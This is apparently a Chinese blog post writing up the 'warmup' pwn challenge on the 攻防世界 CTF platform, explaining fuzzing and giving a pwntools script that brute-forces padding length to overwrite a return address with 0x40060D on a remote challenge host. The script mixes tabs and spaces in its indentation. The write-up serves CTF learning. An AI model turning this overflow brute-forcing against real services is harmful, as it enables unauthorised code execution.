攻防世界进阶区warmup

字数:346字 | 预计阅读时长:1分钟

[攻防世界]进阶区warmup

对于我来说这是个新题型,刚接触到fuzz题
所谓fuzz是一种模糊测试的方法,就是对程序输入各种可能引起异常的语句,看程序的对此作出的反应
所以会用到python中一个处理异常的结构 —— try except

摘自pythontab
try/except语句用来检测try语句块中的错误,从而让except语句捕获异常信息并处理。

题图
没给任何附件,只能fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

addr = 0x40060D #远程连上以后,就会给你提示这个地址,猜测这个地址就是shell地址
def fuzz(p,num,type):  #因为不知道是64位还是32位,也不知道到底用不用加上地址,所以分三种情况尝试
    payload = 'a'*num
    if type == 1:
        payload += p32(addr)
    if type == 2:
        payload += p64(addr)
    p.sendlineafter('>',payload)

for i in range(200):  #爆破看到底需要填充多少个字符
    for j in range(3):  #填充相同字符时,三种情况分别尝试
        p = remote('111.198.29.45',43199)
        try:
	    	fuzz(p,i,j)
            text = p.recv()  #如果程序有输出就接收
	    	print('text=' + text)  #输出接收到的text
	    	print('num='+str(i)+' flag='+str(j))  #输出成功时的i和j值
	    	p.interactive()
        except:
	    	p.close()

最终可以得知这是个64位程序,且中间填充了72个字符,才覆盖了返回地址为0x40060D,最终拿到flag

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */